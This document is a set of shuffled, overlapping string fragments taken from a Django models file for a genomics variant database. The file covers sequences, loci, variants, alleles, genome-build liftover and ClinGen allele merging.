"is one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self)",
"None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild):",
"Variant alt sequence is standard [GATCN] (ie not special or reference) \"\"\" #",
"UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2,",
"find a variant in allele {self.id} for build {genome_build}') if not va: va",
"self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different",
"\"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1",
"if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s:",
"row) There is only 1 Variant for a given locus/alt per database (handled",
"Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return",
"QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions",
"import TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager from flags.models import",
"va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) -> str: return \",",
"import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils",
"import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\",",
"in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep",
"is called at the end of a liftover pipeline (once per build) \"\"\"",
"constraint We only expect to store Alleles for a small fraction of Variants",
"used by ClinGen) - but it's not likely. It's a bug to have",
"return c_hgvs @property def start(self): return self.locus.position @property def end(self): return self.locus.position +",
"success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen Allele (may not",
"models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but invalid error_message =",
"for multiple variants from the same genome build to resolve to the same",
"def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property",
"liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool =",
"@lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name,",
"self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool =",
"name def __format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele):",
"= models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool =",
"variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va =",
"builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in",
"indexes for constraints, and large TextFields give error of: \"index row requires x",
"server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self):",
"Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import settings from django.contrib.auth.models",
"the Variant object - instead do 1-to-1 \"\"\" # Some builds share contigs",
"show allele if there is one, otherwise go to variant page return reverse('view_allele_from_variant',",
"from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN",
"unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash:",
"str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod",
"va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s -",
"during liftover. Can be slow (API call) If you know a VariantAllele exists",
"don't want them on the Variant object - instead do 1-to-1 \"\"\" #",
"ClinGen Allele Registry, but sometimes that can fail. Linked against Variant with VariantAllele",
"via ClinGen Allele Registry, but sometimes that can fail. Linked against Variant with",
"can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if",
"return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status",
"(\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild):",
"None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele: return",
"file (ref + >= 1 alts pointing to the same locus for the",
"is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return",
"collections import logging import re from typing import Optional, Pattern, Tuple, Iterable, Set",
"ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True merge_log_message = f\"{other_allele} merge",
"our normalization not being the same as ClinGen or 2 loci in a",
"else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection)",
"existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va",
"self == other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True",
"AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\",",
"def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) ->",
"return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles()",
"FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str",
"best_attempt: raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}')",
"that can fail. Linked against Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele,",
"with allele/build/variant of %s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return",
"but invalid error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self):",
"\"1:123321 G>C\" style string in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"),",
"Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query",
"from django.db import models, IntegrityError from django.db.models import Value as V, QuerySet, F",
"on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover pipelines. \"\"\"",
"get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return",
"involves reading through a VCF where ID is set to Allele.pk and then",
"= m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig",
"= models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self):",
"@staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in",
"return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if",
"have unique constraints) Postgres by default uses indexes for constraints, and large TextFields",
"\"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(),",
"alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt class",
"The VCF (in genome_build build) is set in UploadedFile for the UploadPipeline \"\"\"",
"c_hgvs @property def start(self): return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length,",
"Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool,",
"same locus for the row) There is only 1 Variant for a given",
"Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF where ID is set",
"return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return",
"def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs",
"So don't want them on the Variant object - instead do 1-to-1 \"\"\"",
"genome build being represented by 1 loci in the build being used by",
"disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label':",
"ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']:",
"choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return",
"variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if",
"as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT =",
"def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in a",
"so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc",
"unique constraints) Postgres by default uses indexes for constraints, and large TextFields give",
"@staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate: ref =",
"is only 1 Variant for a given locus/alt per database (handled via insertion",
"get_absolute_url(self): # will show allele if there is one, otherwise go to variant",
"self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): \"\"\" No",
"from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest",
"VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN)",
"G>C\" style string in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\",",
"self.allele.clingen_allele is None: if self.error: # Retry if server was down return self.error.get(\"errorType\")",
"variants - usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL",
"or alt == '.' @property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT",
"None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise",
"self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property",
"liftover_complete=True): \"\"\" :param liftover_complete: If False does not check for missing representations \"\"\"",
"alleles point to the same locus) There is only 1 Locus for a",
"on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE,",
"= self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in",
"below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele",
"so we can add that unique_together constraint We only expect to store Alleles",
"Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF coordinates during liftover. Can be",
"in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG",
"in a genome build being represented by 1 loci in the build being",
"typing import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import settings",
"alt == '.' @property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property",
"Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across",
"other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}:",
"VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build",
"will show allele if there is one, otherwise go to variant page return",
"position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\",",
"chrom/position/ref per database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position",
"try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self) -> Optional['Variant']:",
"VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants",
"allele = self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build)",
"to the same allele (due to our normalization not being the same as",
"Optional['Liftover']: \"\"\" Only works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs =",
"for same change point to same allele This is generally done via ClinGen",
"genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant':",
"except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one\", va.allele,",
"want to guarantee seq is unique (so Locus/Variant can have unique constraints) Postgres",
"where ID is set to Allele.pk and then creating VariantAllele entries for the",
"contrib has BtreeGistExtension to add via migration \"\"\" seq = models.TextField() seq_md5_hash =",
"requires installing the btree_gist extension (requires postgres Admin rights). Django 3 has ExclusionConstraint,",
"= Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\"",
"def abbreviate(s: str, max_length: int = 20): if len(s) > max_length: s =",
"= VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self):",
"possible for multiple variants from the same genome build to resolve to the",
"via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build =",
"DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the other build shares existing",
"(may not have been possible to retrieve in all builds, but at least",
"is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele",
"from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import",
"def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy",
"retrieve them The VCF (in genome_build build) is set in UploadedFile for the",
"on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) #",
"except ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False)",
"= alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return",
"# Move across ClinGen Allele (may not have been possible to retrieve in",
"= models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)",
"Locus(models.Model): \"\"\" 1 per line in a VCF file (multiple Variants with different",
"same 3 variant/build/allele so we can add that unique_together constraint We only expect",
"Can be slow (API call) If you know a VariantAllele exists for your",
"if there is one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk})",
"update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def",
"annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end,",
"ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk}",
"if self == other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge =",
"used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT",
"store Alleles for a small fraction of Variants So don't want them on",
"f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele =",
"the end of a liftover pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource):",
"self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen Alleles!\"",
"{ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate:",
"models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2,",
"per line in a VCF file (ref + >= 1 alts pointing to",
"+ max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper()",
"track of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele =",
"= models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def",
"have been possible to retrieve in all builds, but at least one #",
"allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles",
"reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error",
"contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return",
"ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or alt ==",
"= get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool:",
"performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge:",
"has BtreeGistExtension to add via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32,",
"self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\"",
"RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models import Wiki",
"links there, and can't have another, so it'll work) other_allele.clingen_allele = None other_allele.save()",
"va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None",
"genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs}",
"least one # links there, and can't have another, so it'll work) other_allele.clingen_allele",
"alt): return ref == alt or alt == '.' @property def is_reference(self) ->",
"on_delete=CASCADE) # Optional, if got a variant but invalid error_message = models.TextField() class",
"va: va = vas.first() if va: return va.variant raise ValueError(f'Could not find any",
"def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source =",
"position, ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt):",
"conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this allele \"\"\" if",
"always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq !=",
"variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a",
"qs = Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self):",
"on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build)",
"AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return",
"format_spec: str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else:",
"other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names =",
"other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection)",
"str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return",
"Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only",
"django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie GRCh37 and GRCh38",
"\"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q",
"alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name,",
"return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does not",
"the same allele (due to our normalization not being the same as ClinGen",
"== ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class",
"alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt =",
"is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\"",
"genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id",
"first Alleles must have already been created - allele_source used to retrieve them",
"special or reference) \"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence() @property",
"= self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38,",
"genome_build: GenomeBuild): \"\"\" This is called at the end of a liftover pipeline",
"\"\"\" Variant alt sequence is standard [GATCN] (ie not special or reference) \"\"\"",
"return True return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\"",
"!= self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self):",
"False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING)",
"other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for",
"is to md5sum seq and make the constraint on that. Another possible solution",
"if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version",
"other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save()",
"Q, FilteredRelation from django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models import",
"FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error =",
"return can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self):",
"scaffolds) - in those cases # we'll have the same variant linked through",
"Variants So don't want them on the Variant object - instead do 1-to-1",
"same allele (due to our normalization not being the same as ClinGen or",
"annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in a query",
"def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self,",
"class Locus(models.Model): \"\"\" 1 per line in a VCF file (multiple Variants with",
